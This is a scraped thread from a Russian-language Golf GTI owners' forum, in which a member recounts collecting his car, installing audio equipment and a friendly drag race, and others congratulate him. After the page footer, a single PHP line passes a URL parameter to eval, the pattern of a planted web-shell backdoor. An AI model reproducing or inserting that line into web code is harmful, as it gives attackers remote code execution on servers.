+ Ответить в теме
Страница 1 из 40 1 2 3 11 ... ПоследняяПоследняя
Показано с 1 по 10 из 398

Тема: Мой Golf GTI


  1. #1
    GTI-Racing daToxa is a jewel in the rough daToxa is a jewel in the rough daToxa is a jewel in the rough daToxa is a jewel in the rough Аватар для daToxa
    Регистрация
    22.04.2009
    Откуда
    Tiflis
    Машина
    Audi S3 1.8T
    Сообщений
    739

    Мой Golf GTI

    Как и обещал!!!

    Даааааааааааааааааааааааааааа, что же еще добавить? Наконец-то я получил моего гольфа, проторчав с 6 утра до 2х дня на ногах, под дождичком, на таможе, где нет никаких удобств для ожидающих, ни тебе скамеек, ни тебе навесов, короче начало было не самое приятное, но когда наконец-то открылись створки "ворот" парома и съехало классное такое, серебристое чудо, моему счастью не было предела, несмотря на всю ночь в поезде, 8 часов на ногах, я как будто заново проснулся, 400 км пролетели легко и непринужденно, многие пали на трассе, мы ехали по красивейшим местам (ах как жаль что не было с собой фотика), по шикарному серпантину, и тут Гольф сразу показал себя, надежный, мощный, послушный, слова сложно подобрать, это первая моя машина которую я именно ХОТЕЛ КУПИТЬ (обе предыдущие были приобретены из соображений вместимости и практичности, хорошие машинки были Спейс раннер и Спейс Вагон). К сожалению обещанную решетку радиатора и реснички мне не привезли, буду искать тут (Реснички уже нашел, куплю на той неделе). Отчеты о проводимых с машиной работах будут публиковаться, надеюсь Регулярно:)

















    (Ребяты/девчаты, помогите кликуху придумать машине=))
    При ускорении слезы восхищения должны стекать горизонтально в направлении ушей (c)Вальтер Рерль
    Перед торможением двигателем сначала происходит торможение бампером, затем - облицовкой радиатора, радиатором и только после этого - двигателем...

  2. #2
    GTI-Racing Марат is on a distinguished road Аватар для Марат
    Регистрация
    18.12.2007
    Откуда
    Республика Башкортостан
    Машина
    Golf V GTI DSG
    Сообщений
    199
    Поздравляю и желаю наилучших эмоций от общения с этим красавчиком :)!

  3. #3
    GTI-Racing mas1er is on a distinguished road Аватар для mas1er
    Регистрация
    08.09.2006
    Откуда
    Краснодар
    Машина
    mk4
    Сообщений
    1,405
    поздравляю, я понимаю тебя, т.к. мой гольф тоже не первый и именно то что хотел, хотя заказывал его, отдал деньги и не видел его до последнего момента когда возврата нет=))
    п.с. это не серебро, а немного молочный??? или это солнце так??
    п.с. а у кого на гольфе на заднем крючке есть пластиковая крышка декоративная, закрывающая кюк???? у меня былаа,. посеял только ее я=((
    '02mk4 GTi st1 * Forge007 DV * WEITEC coilovers * 312 * R32 sway bar продан
    '12mk6 GTi MT APR * Carbonio intake * Neuspeed Turbo Outlet pipe * Eibach Sportline

  4. #4
    GTI-Racing daToxa is a jewel in the rough daToxa is a jewel in the rough daToxa is a jewel in the rough daToxa is a jewel in the rough Аватар для daToxa
    Регистрация
    22.04.2009
    Откуда
    Tiflis
    Машина
    Audi S3 1.8T
    Сообщений
    739
    Цвет - серебро, солнце зараза, било, у меня не было возмоности красивый постановочный кадр сделать, вот когда ништяки будут на машине, потом ужо расстараюсь=)

    спасибо ))))

    Добавлено через 6 минут
    Кстати, ранее в машине явно была неплохая аппаратура, ибо ни динамиков, ни усилка нет, а проводка под все это дело осталась, и явно не заводская. остался только цд-чейнджер Кенвуд да магнитолка той же фирмы, тока кассетная. Бум ставить Клэрион или Пионер, скорей все же первую.
    Последний раз редактировалось daToxa; 29.05.2009 в 22:53. Причина: Добавлено сообщение
    При ускорении слезы восхищения должны стекать горизонтально в направлении ушей (c)Вальтер Рерль
    Перед торможением двигателем сначала происходит торможение бампером, затем - облицовкой радиатора, радиатором и только после этого - двигателем...

  5. #5
    III место Лучший Пилот клуба 2011 Гера has a spectacular aura about Гера has a spectacular aura about Гера has a spectacular aura about Аватар для Гера
    Регистрация
    08.11.2007
    Откуда
    в Москве
    Машина
    Nissan Quest
    Сообщений
    4,674
    Цитата Сообщение от daToxa Посмотреть сообщение
    Как и обещал!!!

    (Ребяты/девчаты, помогите кликуху придумать машине=))
    Тут одно хорошее имя освободилось - никто путать не будет! Назови машину recarospeed! :laugh:
    Golf V GTI МКПП + REVO k04 Stage 3 + Quiafe LSD + intake air system K&N + sway bars H&R + BSR down pipe + APR`s exhaust + сooler autobahn88 + водитель Сергей - продано...

  6. #6
    GTI-Racing daToxa is a jewel in the rough daToxa is a jewel in the rough daToxa is a jewel in the rough daToxa is a jewel in the rough Аватар для daToxa
    Регистрация
    22.04.2009
    Откуда
    Tiflis
    Машина
    Audi S3 1.8T
    Сообщений
    739
    Хы, неплохо так, я больше склоняюсь к SilverStrike или SilverStreak:):):)

    Добавлено через 5 часов 10 минут
    Воть, в машине динамики JBL, голова Clarion DXZ776USB готова к установке, которая состоится сегодня или завтра:)

    Добавлено через 15 часов 55 минут
    Ну е-мое, я фигею дорогая редакция, проводка под аудио просто потрясна, при желании подключить 4 динамика в дверях БЕЗ усилка, придется перелопатить весь интерьер, придется покупать усилок в понедельник, млин, непредвиденные траты :( ну что ж, держись МАГНАТ:laugh::laugh::laugh:


    А, вот, еще, седня впервые погонялся, масенький такой драг, супротив друга на 328 бэхе, на 400 метров он обошел меня на 2,5-3 корпуса, не более, учитывая что у него далеко не "сток", я был реально удивлен, он был удивлен еще больше так как думал что 4й Носок ГТИ медленней чем 325, а оказалось что 325 падут пред моим праведным гневом :D :D :D :D
    Последний раз редактировалось daToxa; 31.05.2009 в 01:19. Причина: Добавлено сообщение
    При ускорении слезы восхищения должны стекать горизонтально в направлении ушей (c)Вальтер Рерль
    Перед торможением двигателем сначала происходит торможение бампером, затем - облицовкой радиатора, радиатором и только после этого - двигателем...

  7. #7
    GTI-Racing daToxa is a jewel in the rough daToxa is a jewel in the rough daToxa is a jewel in the rough daToxa is a jewel in the rough Аватар для daToxa
    Регистрация
    22.04.2009
    Откуда
    Tiflis
    Машина
    Audi S3 1.8T
    Сообщений
    739
    Сегодня наконец-то встали на свои законные места: Мафон и Усилок (Очень удачно прикупил 4х-канальный Alpine V12 MRV-F407 за смешную цену в 150 бачей).
    Звуком пока доволен, но знаю что захочу большего. Никак не дошли руки сменить фоты:(
    Последний раз редактировалось daToxa; 03.06.2009 в 17:20.
    При ускорении слезы восхищения должны стекать горизонтально в направлении ушей (c)Вальтер Рерль
    Перед торможением двигателем сначала происходит торможение бампером, затем - облицовкой радиатора, радиатором и только после этого - двигателем...

  8. #8
    Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Регистрация
    08.11.2006
    Откуда
    Москва
    Машина
    Skoda
    Сообщений
    15,564
    Дальше делай еще чего нибудь интересного )))
    песок сыпется....не останавливайтесь на достигнутом !

  9. #9
    GTI-Racing keks is on a distinguished road Аватар для keks
    Регистрация
    25.01.2008
    Откуда
    Москва
    Машина
    mk4 25th anniversary
    Сообщений
    794
    Поздравляю с покупкой. Закупай ништяки :)

  10. #10
    GTI-Racing S@TURN will become famous soon enough Аватар для S@TURN
    Регистрация
    09.07.2006
    Откуда
    мск
    Машина
    vr6 color concept - sold, а4 2.5tdi куатро!-sold, EOS - недопережитиай.
    Сообщений
    3,787
    тааак)))) когда номера получишь GTI??))))мы бы дружно оценили)))
    NON LIMITUS HOMICUS DOLBOEBICUS
    (нет предела человеческой глупости)

+ Ответить в теме
Страница 1 из 40 1 2 3 11 ... ПоследняяПоследняя

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}